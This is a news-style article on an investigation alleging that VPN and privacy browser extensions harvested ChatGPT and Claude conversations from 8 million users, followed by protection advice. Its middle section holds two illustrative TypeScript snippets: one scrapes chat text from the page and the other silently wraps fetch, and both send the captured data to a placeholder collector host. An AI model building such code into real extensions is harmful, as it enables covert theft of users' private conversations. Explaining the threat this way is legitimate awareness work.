8 Million Users' ChatGPT and Claude Conversations Harvested by 'Privacy' Browser Extensions
The browser extensions promising to protect your privacy may be doing the opposite. A new investigation reveals that extensions marketed as VPN and privacy tools have allegedly been harvesting AI conversations from 8 million users and selling the data for profit.
The investigation, published by Koi AI, found that extensions including Urban VPN were capturing users' conversations with AI assistants such as ChatGPT and Claude, among other services. The extensions then allegedly sold this conversational data, which often contains sensitive personal and professional information, to third parties.
The Privacy Paradox: Extensions That Spy on Your AI Chats
The irony is brutal: users installed these extensions specifically to enhance their privacy. Instead, they got surveillance. Browser extensions have broad permissions by design—they need access to your browsing activity to function. But that same access creates an attack surface that bad actors can exploit.
AI conversations are particularly valuable data. People tell ChatGPT and Claude things they wouldn't type into Google: business strategies, personal problems, code with proprietary logic, medical questions, financial details. This isn't search history. It's intimate intellectual output.
The 8 million affected users trusted these tools with their browsing. That trust was monetized.
How Browser Extension Surveillance Works
Browser extensions can read and modify webpage content. A VPN extension legitimately needs some network access, but it doesn't need to read your ChatGPT conversations. The extensions in question allegedly exceeded their stated purpose, capturing form inputs and conversation text from AI platforms.
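To make that concrete, here's a minimal sketch of what such a content script could look like. Everything in it is illustrative: the selectors, the collector URL, and the overall shape are hypothetical, not code from the investigation.

```ts
// content-script.ts (illustrative only; selectors and endpoint are hypothetical).
// A script like this gets injected via the extension's manifest with a
// "matches": ["<all_urls>"] pattern, the permission Chrome surfaces as
// "Read and change all your data on all websites".

const COLLECTOR_URL = "https://collector.example.com/ingest"; // hypothetical

// On chat sites, prompts and responses end up as ordinary DOM nodes that any
// content script running on the page can read.
const observer = new MutationObserver(() => {
  // A real harvester would use site-specific selectors and deduplicate;
  // this generic one just grabs anything shaped like a message bubble.
  const messages = Array.from(
    document.querySelectorAll<HTMLElement>("[data-message-id], .message")
  ).map((el) => el.innerText);

  if (messages.length > 0) {
    // Ship the captured text to the collector in the background.
    void fetch(COLLECTOR_URL, {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ page: location.hostname, messages }),
    });
  }
});

observer.observe(document.body, { childList: true, subtree: true });
```

Nothing here requires exotic capabilities. It's ordinary DOM access, which is exactly why broad host permissions are the thing to scrutinize.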
This data collection often happens invisibly. Users see an active VPN indicator and assume they're protected. Meanwhile, every prompt can pass through the extension's logging code before it ever reaches OpenAI's or Anthropic's servers, and every response can be captured the moment it arrives.
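DOM scraping isn't the only route. A script injected into the page can also wrap the browser's own networking API so traffic gets copied before it leaves the tab. Again, a hedged sketch; the logging endpoint is hypothetical:

```ts
// Illustrative fetch-wrapping sketch; the logging endpoint is hypothetical.
// A script running in the page context can replace window.fetch, copying each
// outgoing body (the user's prompt) before forwarding the call, so the site
// keeps working and nothing looks wrong.

const realFetch = window.fetch.bind(window);

window.fetch = async (input: RequestInfo | URL, init?: RequestInit) => {
  try {
    if (init?.body && typeof init.body === "string") {
      // sendBeacon fires and forgets, so logging never slows the page down.
      navigator.sendBeacon(
        "https://collector.example.com/log", // hypothetical
        JSON.stringify({ url: String(input), body: init.body })
      );
    }
  } catch {
    // Swallow errors so the interception stays invisible.
  }
  const response = await realFetch(input, init);
  // Responses can be read the same way without disturbing the page:
  // response.clone().text().then(logToCollector);  // logToCollector: hypothetical
  return response;
};
```

Because the original fetch still runs, the site behaves exactly as before. There's nothing for the user to notice.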
The captured conversations were allegedly packaged and sold. Who bought them? The investigation doesn't say. But the market for AI training data is hot, and real human conversations with AI systems are valuable for fine-tuning models.
Protecting Your AI Conversations
The lesson isn't to avoid all browser extensions—it's to be ruthless about which ones you trust.
Audit your extensions now. Open your browser's extension manager and examine what's installed. For each extension, ask: Does this need to read my data on all websites? Free VPN extensions are particularly risky; the service has to pay for servers somehow, and if you're not paying with money, you're paying with data.
Use dedicated apps when possible. OpenAI's desktop app for ChatGPT and Anthropic's Claude app bypass the browser entirely. No extensions can intercept those conversations.
Check permissions before installing. Chrome and Firefox show what access an extension requests. "Read and change all your data on all websites" is a red flag for any extension that doesn't absolutely need it.
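For reference, that warning corresponds to broad host permissions in the extension's manifest. Here's a hypothetical Manifest V3 excerpt, written as a TypeScript object so the risky fields can be annotated inline; none of this is from a real extension.

```ts
// Hypothetical manifest.json contents, shown as a TypeScript object for
// annotation. None of this is taken from any real extension.
const overBroadManifest = {
  manifest_version: 3,
  name: "Example Free VPN",
  version: "1.0.0",

  // "<all_urls>" is what triggers Chrome's install-time warning
  // "Read and change all your data on all websites".
  host_permissions: ["<all_urls>"],

  // Injecting a script into every page is all it takes to read chat UIs.
  content_scripts: [{ matches: ["<all_urls>"], js: ["capture.js"] }],
};

// A tightly scoped alternative: proxy control alone routes traffic without
// granting any access to page content.
const scopedManifest = {
  manifest_version: 3,
  name: "Example Scoped VPN",
  version: "1.0.0",
  permissions: ["proxy"],
};
```

A VPN-style extension built on the proxy permission alone never needs to read a single page. That's a useful bar to hold free extensions to.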
Consider browser profiles. Use a clean browser profile—with zero extensions—for sensitive AI work. Keep your extension-heavy profile for casual browsing.
The Bigger Picture
This incident exposes a growing problem: AI interfaces have become some of our most sensitive digital surfaces, but we interact with them through browsers laden with third-party code. The browser extension model, designed decades ago, wasn't built for a world where people share their deepest thoughts with AI assistants.
OpenAI and Anthropic encrypt conversations in transit and at rest. But that security ends where your browser begins. Your extensions see everything, decrypted and ready to harvest.
Eight million users learned that the hard way.